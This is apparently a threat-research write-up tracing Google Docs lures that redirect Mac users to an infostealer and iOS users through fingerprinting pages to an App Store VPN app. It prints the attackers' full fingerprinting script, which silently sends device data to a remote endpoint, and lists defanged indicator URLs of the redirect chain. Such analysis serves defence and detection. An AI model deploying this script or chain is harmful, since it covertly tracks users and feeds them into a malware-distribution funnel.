
Google Dorks → iOS infostealer

Google Dorking site:docs.google.com intitle:"Download ZIP" reveals thousands of Google Docs trying to deliver malware.

Clicking the links embedded in these docs will result in different things depending on your browser's User-Agent. On Mac, you'll either be redirected to a MacSync infostealer, or to a URL Removed page. On iOS, however, while we are sometimes redirected to sites serving adult content, the vast majority of links redirect to pages like this:

We also see a middleman: a URL shortener that grabs the user's User-Agent to decide which page to serve.

The WHOIS data for the middlemen show that they were all created earlier this year. Clicking OK or really anywhere on the iOS pages will take the user through 2 more redirects, including a fingerprinting "Advanced Data Collection" module with Russian comments:

   <title>Redirecting...</title>
    <style>
        * { margin: 0; padding: 0; }
        html, body { width: 100%; height: 100%; background: #FFFFFF; }
    </style>
</head>
<body>
    <script>
        // Analyst note: final navigation target. The script's last step assigns this URL to
        // window.location.href. The `data` query value is base64-encoded JSON; decoded, it holds
        // the keys click_id, geo_cc, traffic_offer, app_id, uid, token1, campaign_id, set_id and
        // tracker_source (value "binom"), with uid = 67661201.
        // NOTE(review): the host reads "domain.work" in this listing while the redirect chain on
        // the page shows the same /crm/install.php path on another host; presumably redacted here.
        var universalLink = "https:\/\/domain.work\/crm\/install.php?data=eyJjbGlja19pZCI6ImQ1N2Vhc2Z1YTdwczczYzNscnRnIiwiZ2VvX2NjIjoiVVMiLCJ0cmFmZmljX29mZmVyIjoiNDQiLCJhcHBfaWQiOjgsInVpZCI6Njc2NjEyMDEsInRva2VuMSI6IjM0NTgwMSIsImNhbXBhaWduX2lkIjoiMTYzOCIsInNldF9pZCI6ODI4NzIyOCwidHJhY2tlcl9zb3VyY2UiOiJiaW5vbSJ9";
        // Analyst note: endpoint that receives the fingerprint as GET query parameters. Its `id`
        // value equals the `uid` field inside the decoded `data` blob above, so the fingerprint
        // and the install click share one identifier.
        var resolutionPixel = "https:\/\/domain.work\/crm\/resolution.php?id=67661201";
        
        // ============================================
        // 🔥 FINGERPRINT v2.0 - Расширенный сбор данных
        // ============================================
        
        /**
         * Analyst annotation (specimen code left unchanged; original Russian comments kept and
         * translated in brackets).
         *
         * Builds and returns a plain object describing the visitor's device: screen size and
         * pixel ratio, IANA timezone name and UTC offset, browser language tags, a 12h/24h clock
         * flag, a metric/imperial guess, and a short hash of a subset of those values.
         * Every value is read from screen, window, navigator, Intl or Date; nothing in this
         * function triggers a permission prompt, so the collection is invisible to the user.
         *
         * @returns {Object} fp with keys w, h, scale, screen, timezone, tz_offset, language,
         *   lang_code, region, pref_langs, is_24h, metric, hash.
         */
        function collectFingerprint() {
            var fp = {};
            
            // Базовые параметры экрана  [EN: Basic screen parameters]
            fp.w = screen.width;
            fp.h = screen.height;
            fp.scale = window.devicePixelRatio || 1;
            // Composite string of the three values above, e.g. "<w>x<h>@<scale>".
            fp.screen = fp.w + 'x' + fp.h + '@' + fp.scale;
            
            // Timezone (ОЧЕНЬ важно для matching!)  [EN: Timezone (VERY important for matching!)]
            // Falls back to an empty string if Intl is unavailable or throws.
            try {
                fp.timezone = Intl.DateTimeFormat().resolvedOptions().timeZone || '';
            } catch(e) {
                fp.timezone = '';
            }
            
            // Timezone offset в часах (например, 3 для UTC+3)  [EN: Timezone offset in hours (e.g. 3 for UTC+3)]
            // getTimezoneOffset() returns minutes and is positive west of UTC, hence the negation;
            // the result can be fractional for half-hour zones.
            fp.tz_offset = -(new Date().getTimezoneOffset() / 60);
            
            // Язык и регион  [EN: Language and region]
            // navigator.userLanguage is the legacy Internet Explorer property, used as a fallback.
            var lang = navigator.language || navigator.userLanguage || '';
            var langParts = lang.split('-');
            fp.language = lang;
            fp.lang_code = langParts[0] || '';  // "ru"
            fp.region = langParts[1] || '';      // "RU"
            
            // Preferred languages (важно для matching)  [EN: Preferred languages (important for matching)]
            // Only the first three entries of navigator.languages are kept, comma-joined.
            fp.pref_langs = '';
            if (navigator.languages && navigator.languages.length > 0) {
                fp.pref_langs = navigator.languages.slice(0, 3).join(',');
            }
            
            // 24-часовой формат времени  [EN: 24-hour time format]
            // Stored as the string '1' or '0', not as a boolean.
            fp.is_24h = is24HourFormat() ? '1' : '0';
            
            // Метрическая система (определяем по региону)  [EN: Metric system (determined by region)]
            // Derived purely from the region part of the language tag; an empty region yields '1'.
            var imperialRegions = ['US', 'LR', 'MM'];
            fp.metric = imperialRegions.includes(fp.region.toUpperCase()) ? '0' : '1';
            
            // Генерируем hash для быстрого matching  [EN: Generate a hash for fast matching]
            fp.hash = generateFpHash(fp);
            
            return fp;
        }
        
        /**
         * Analyst annotation: infers the visitor's clock format without asking for it.
         * Formats a fixed 13:00 timestamp with the browser's default locale and reports true
         * when the resulting string contains neither "AM" nor "PM" (case-insensitive).
         * If formatting throws, the function returns true.
         *
         * @returns {boolean} true when no AM/PM marker is found or an exception occurs.
         */
        function is24HourFormat() {
            try {
                // 1 Jan 2000, 13:00:00 local time; an afternoon hour renders differently in 12h and 24h locales.
                var date = new Date(2000, 0, 1, 13, 0, 0);
                var timeString = date.toLocaleTimeString();
                return !timeString.match(/AM|PM/i);
            } catch(e) {
                return true;
            }
        }
        
        /**
         * Analyst annotation: reduces seven fingerprint fields to a short base-36 token.
         * The fields w, h, scale, timezone, tz_offset, language and is_24h are joined with '|'
         * and folded character by character into a 32-bit integer; region, pref_langs and metric
         * are not part of the input. The function is deterministic and non-cryptographic, so any
         * two devices reporting the same seven values produce the same token.
         * NOTE(review): presumably the server uses this token to correlate the browser visit
         * with a later event; the server side is not shown on the page.
         *
         * @param {Object} fp - object populated by collectFingerprint().
         * @returns {string} absolute value of the 32-bit hash, rendered in base 36.
         */
        function generateFpHash(fp) {
            // Создаем уникальный hash на основе стабильных параметров  [EN: Create a unique hash based on stable parameters]
            var fpString = [
                fp.w, fp.h, fp.scale,
                fp.timezone, fp.tz_offset,
                fp.language, fp.is_24h
            ].join('|');
            
            var hash = 0;
            for (var i = 0; i < fpString.length; i++) {
                // (hash << 5) - hash is hash * 31; the char code of each UTF-16 unit is added.
                hash = ((hash << 5) - hash) + fpString.charCodeAt(i);
                // Bitwise AND with itself truncates the running value to a signed 32-bit integer.
                hash = hash & hash;
            }
            return Math.abs(hash).toString(36);
        }
        
        // ============================================
        // Собираем и отправляем fingerprint
        // ============================================
        // Analyst annotation: runs immediately on page load. It collects the fingerprint, sends it
        // to the resolutionPixel URL as GET query parameters, then navigates to universalLink
        // after 150 ms. No response handler is attached to the request, so the page does not read
        // the server's answer. For detection, the distinctive artefact in proxy or DNS-layer logs
        // is a GET whose query string carries `id=` followed by the parameter names w, h, fp_hash,
        // fp_timezone, fp_tz_offset, fp_language, fp_region, fp_screen, fp_scale, fp_pref_langs,
        // fp_is_24h and fp_metric, in that order.
        (function() {
            var fp = collectFingerprint();
            
            // Формируем URL параметры  [EN: Build the URL parameters]
            // String-valued fields are passed through encodeURIComponent; the numeric and
            // fixed '0'/'1' fields are concatenated as-is.
            var params = [
                'w=' + fp.w,
                'h=' + fp.h,
                'fp_hash=' + encodeURIComponent(fp.hash),
                'fp_timezone=' + encodeURIComponent(fp.timezone),
                'fp_tz_offset=' + fp.tz_offset,
                'fp_language=' + encodeURIComponent(fp.language),
                'fp_region=' + encodeURIComponent(fp.region),
                'fp_screen=' + encodeURIComponent(fp.screen),
                'fp_scale=' + fp.scale,
                'fp_pref_langs=' + encodeURIComponent(fp.pref_langs),
                'fp_is_24h=' + fp.is_24h,
                'fp_metric=' + fp.metric
            ].join('&');
            
            // Отправляем fingerprint  [EN: Send the fingerprint]
            // Asynchronous GET (third argument true); resolutionPixel already ends in "?id=...",
            // so the parameters are appended with "&".
            var xhr = new XMLHttpRequest();
            xhr.open("GET", resolutionPixel + "&" + params, true);
            xhr.send();
            
            // Редирект на Universal Link (с небольшой задержкой для fingerprint)  [EN: Redirect to the Universal Link (with a small delay for the fingerprint)]
            // The 150 ms timer gives the request above time to leave before the page unloads.
            setTimeout(function() {
                window.location.href = universalLink;
            }, 150);
        })();
    </script>

This then leads into a "Universal Link", which redirects the user to the App Store. The redirect is always for the same app, and always with the Russian HTML comment Мгновенный редирект в App Store ("Instant redirect to the App Store"). The app is StrongNet VPN: Privacy Defense.

hxxps://docs.google.com/file/d/1NfMIVpnNQMeLbD6jHNN1qw5nQ3BeOqs1/
hxxps://ccgcg.com/2DXe8p
hxxps://phone-protection.pro/smt-sn109/index.php?lp_key=176685e0af439bdd574db98df179bd18e3bf407439&trafficsource_name=SMT_CPA%20%7C%20(ts_offer=44)&campaign=1635&trafficsource=47&lander=313&country_code=US&device_model=iPhone#
hxxps://strong-super.website/click.php?lp=1
hxxps://strong-info.work/crm/install.php?clickid=d57ij6vua7ps73cdvat0&os_version=18.6&country_code=US&ts_offer=44&aid=8&unixtime=1766795675&t1=345801&t2=&t3=&t4=&t5=&lp=316&campaign_id=1639&set=8287228
hxxps://strong-info.work/crm/install.php?data=eyJjbGlja19pZCI6ImQ1N2lqNnZ1YTdwczczY2R2YXQwIiwiZ2VvX2NjIjoiVVMiLCJ0cmFmZmljX29mZmVyIjoiNDQiLCJhcHBfaWQiOjgsInVpZCI6Njc2ODU4MzEsInRva2VuMSI6IjM0NTgwMSIsImNhbXBhaWduX2lkIjoiMTYzOSIsInNldF9pZCI6ODI4NzIyOCwidHJhY2tlcl9zb3VyY2UiOiJiaW5vbSJ9
hxxps://apps.apple.com/us/app/strongnet-vpn-privacy-defence/id6477825452

full redirect chain